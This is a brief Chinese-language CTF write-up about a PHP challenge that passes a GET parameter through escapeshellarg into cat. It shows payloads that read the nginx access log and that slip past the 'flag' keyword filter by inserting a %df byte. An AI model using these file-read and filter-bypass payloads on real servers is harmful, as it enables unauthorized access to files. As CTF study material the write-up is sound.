?很难受啊,比赛的时候根据提示猜到flag的文件名肯定在日志文件中,但不知道日志文件在哪里...
进去后直接给出一段php代码
<?php
if (isset($_GET['cmd'])) {
$cmd = $_GET['cmd'];
if (!preg_match('/flag/i',$cmd))
{
$cmd = escapeshellarg($cmd);
system('cat ' . $cmd);
}
} else {
highlight_file(__FILE__);
}
?>这里由于不能使用*和?进行匹配,查看日志文件后可以看到flag的文件名
利用cat命令查看日志
?cmd=/var/log/nginx/access.log
?知道文件名后我们需要绕过正则匹配和escapeshellarg函数
由于escapeshellarg函数会忽略ascll大于127的字符,所以我们构造payload
?cmd=this_is_final_fla%dfg_e2a457126032b42d.php首先可以绕过正则匹配,当执行escapeshellarg函数时,会忽略掉%df
